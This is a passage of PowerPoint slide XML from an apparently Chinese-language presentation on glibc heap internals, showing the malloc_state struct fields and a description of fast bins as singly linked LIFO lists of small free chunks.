                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>last_remainder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* Normal bins packed as described above */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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mchunkptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[ NBINS * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ];</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* Bitmap of bins, help to speed up the process of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>determinating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> if a given bin is definitely empty.*/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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unsigned</a:t>
            </a:r>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>binmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[ BINMAPSIZE ];</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* Linked list, points to the next arena */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malloc_state</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* Linked list for free arenas.  Access to this field is serialized</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>free_list_lock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>arena.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.  */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malloc_state</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>next_free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* Number of threads attached to this arena.  0 if the arena is on</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       the free list.  Access to this field is serialized by</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>free_list_lock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>arena.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.  */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    INTERNAL_SIZE_T </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attached_threads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* Memory allocated from the system in this arena.  */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    INTERNAL_SIZE_T </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>system_mem</a:t>
            </a:r>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    INTERNAL_SIZE_T </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>max_system_mem</a:t>
            </a:r>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1C78366-619B-44FA-9510-545D5A34DDA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5042622" y="876500"/>
            <a:ext cx="6096000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>main arena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>malloc_state</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>并不是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>heap segment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>的一部分，而是一个全局变量，存储在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>libc.so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>的数据段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4523F55C-3161-4D65-9A0D-F7DD3E8609D6}"/>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bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362174166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 name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C8C7642-9C56-484D-95DD-7187DE921B60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378101" y="3001055"/>
            <a:ext cx="8208885" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">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fastbinsY[] </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单向列表 </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LIFO </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管理 16、24、32、40、48、56、64 Bytes 的 free chunks（32位下默认） </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其中的 chunk 的 in_use 位（下一个物理相邻的 chunk 的 P 位）总为1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE06066D-4903-4C94-9D92-567420132954}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378101" y="1859419"/>
            <a:ext cx="1946367" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fast bins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73506D7E-9A28-4AB6-B7F0-4243F3167C81}"/>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bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="363950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06BF837-3378-47AE-A942-F54658058031}"/>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993485" y="1388112"/>
            <a:ext cx="4379512" cy="4442076"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8B9D870-1FCD-4E78-BC1E-4319999B0522}"/>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6328229" y="1388112"/>
            <a:ext cx="4598487" cy="4442076"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD18D9CB-62E2-4E71-A7D5-9DDF706A4301}"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>进程虚拟地址空间</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2780396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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AA3423E-D26A-4D61-B735-880C2E35617D}"/>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966404" y="1180729"/>
            <a:ext cx="8259191" cy="498481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136EBD71-D5CC-48A8-B4EA-50509E2A87DD}"/>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bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="346415015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 name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B19B9D2-E81C-4A50-BEFA-22C553774865}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
